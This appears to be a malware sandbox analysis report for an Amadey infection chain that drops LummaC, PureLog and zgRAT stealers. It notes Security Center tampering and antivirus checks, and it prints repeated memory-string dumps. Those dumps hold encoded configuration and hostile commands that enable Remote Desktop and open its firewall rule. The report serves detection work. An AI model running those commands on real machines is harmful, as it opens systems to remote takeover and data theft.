Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10359660101\xZRvIQ5.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10359660101\xZRvIQ5.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10359820261\martin.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10359820261\martin.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\SUAosT64HD.exe

Code function: 1_2_004BCB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

1_2_004BCB1A

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 2_2_006865B0 LookupAccountNameA,

2_2_006865B0

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 2_2_006C23D7 waveInStart,GetTimeZoneInformation,

2_2_006C23D7

Lowering of HIPS / PFW / Operating System Security Settings

Changes security center settings (notifications, updates, antivirus, firewall)

Source: C:\Windows\System32\svchost.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: svchost.exe, 00000000.00000002.2562104386.0000021CD3902000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Files%\Windows Defender\MsMpeng.exe
Source: Null.28.dr	Binary or memory string: processed file: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: svchost.exe, 00000000.00000002.2562104386.0000021CD3902000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: ssisd.sys.14.dr	Binary or memory string: MsMpEng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadey

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Amadeys Clipper DLL

Source: Yara match	File source: 00000008.00000002.1534580911.00000000002D1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.1444142824.0000000004EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1830573894.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2559503167.00000000002D1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1535079215.00000000002D1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.1494796029.0000000004F70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1484931931.0000000000721000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.1493744531.0000000004A90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 10.2.axplong.exe.680000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SUAosT64HD.exe.4a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.axplong.exe.680000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.axplong.exe.680000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1368603933.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1364938881.00000000004A1000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1382830343.00000000049B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1854236360.0000000000681000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.1812065922.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2559760358.0000000000681000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1436302014.0000000000681000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match	File source: 29.0.Rm3cVPI.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.Rm3cVPI.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\10358260101\Rm3cVPI.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Rm3cVPI[1].exe, type: DROPPED

Yara detected PureLog Stealer

Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\39pazbF[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\10358510101\39pazbF.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\39pazbF[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\10358510101\39pazbF.exe, type: DROPPED

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: 29.0.Rm3cVPI.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.Rm3cVPI.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\10358260101\Rm3cVPI.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Rm3cVPI[1].exe, type: DROPPED

Yara detected PureLog Stealer

Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\39pazbF[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\10358510101\39pazbF.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\39pazbF[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\10358510101\39pazbF.exe, type: DROPPED

Contains functionality to start a terminal service

Source: 3d9778a1ff.exe	String found in binary or memory: net start termservice
Source: 3d9778a1ff.exe, 00000004.00000003.1444142824.0000000004EE0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: 3d9778a1ff.exe, 00000004.00000003.1444142824.0000000004EE0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: 3d9778a1ff.exe, 00000004.00000002.1484931931.0000000000721000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: net start termservice
Source: 3d9778a1ff.exe, 00000004.00000002.1484931931.0000000000721000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe	String found in binary or memory: net start termservice
Source: rapes.exe, 00000007.00000002.1535079215.00000000002D1000.00000040.00000001.01000000.0000000B.sdmp	String found in binary or memory: net start termservice
Source: rapes.exe, 00000007.00000002.1535079215.00000000002D1000.00000040.00000001.01000000.0000000B.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe, 00000007.00000003.1494796029.0000000004F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: rapes.exe, 00000007.00000003.1494796029.0000000004F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe	String found in binary or memory: net start termservice
Source: rapes.exe, 00000008.00000002.1534580911.00000000002D1000.00000040.00000001.01000000.0000000B.sdmp	String found in binary or memory: net start termservice
Source: rapes.exe, 00000008.00000002.1534580911.00000000002D1000.00000040.00000001.01000000.0000000B.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc 